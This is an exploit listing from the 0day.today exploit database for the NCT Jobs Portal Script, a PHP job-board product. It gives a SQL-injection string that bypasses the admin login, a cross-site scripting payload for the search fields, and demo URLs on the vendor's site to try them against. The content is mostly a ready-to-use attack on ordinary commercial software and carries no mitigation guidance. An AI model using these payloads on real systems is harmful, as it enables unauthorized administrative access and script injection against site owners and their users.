[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

NCT Jobs Portal Script XSS and Authentication bypass

Author
Sid3^effects
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11975
Category
web applications
Date add
24-04-2010
Platform
php
==================================================== 
NCT Jobs Portal Script XSS and Authentication bypass
====================================================

# Exploit Title: XSS and Authentication bypass in NCT Jobs Portal Script
# Date: 24-apr-2010
# Author: Sid3^effects
# Software Link: N/a
# CVE : []
# Code : []      ______________________________________________________________________________
                    XSS and Authentication bypass in NCT Jobs Portal Script
                         Vendor:http://www.ncrypted.net/
     ___________________________Author:Sid3^effects_________________________________
   
 
Description :
 
NCT Jobs Portal script is a web product for running powerful and customized job portals. Be it a fresh site that you want to launch or be it for integration into your already existing website, NCT Jobs Portal is everything you need when it comes to job portal or business networking solution. Jobs Portal comes with a front-end and a back-end (Admin Panel). Admin Panel has a wide range of functions along with a CMS (Content Management System) which will easily enpower you to customize and manage your very own Jobs Portal.
 
script cost :$99
---------------------------------------------------------------------------
    * Authentication bypass:
 
    The following script has authentication bypass in the admin login
 
    use ' or 1=1 or ''=' in both login and password.
 
DEMO :http://clients.ncrypted.net/NCTJobs/admin/login.php
---------------------------------------------------------------------------
    * XSS (cross site scripting ) :
        
    XSS is also found in the search field.
 
 Parameter Name: Keywords or Tags or Desired City
 Parameter Type: Querystring
 Attack Pattern: '"--><script>alert(0x000872)</script>
DEMO:http://clients.ncrypted.net/NCTJobs/      
---------------------------------------------------------------------------



#  0day.today [2024-11-16]  #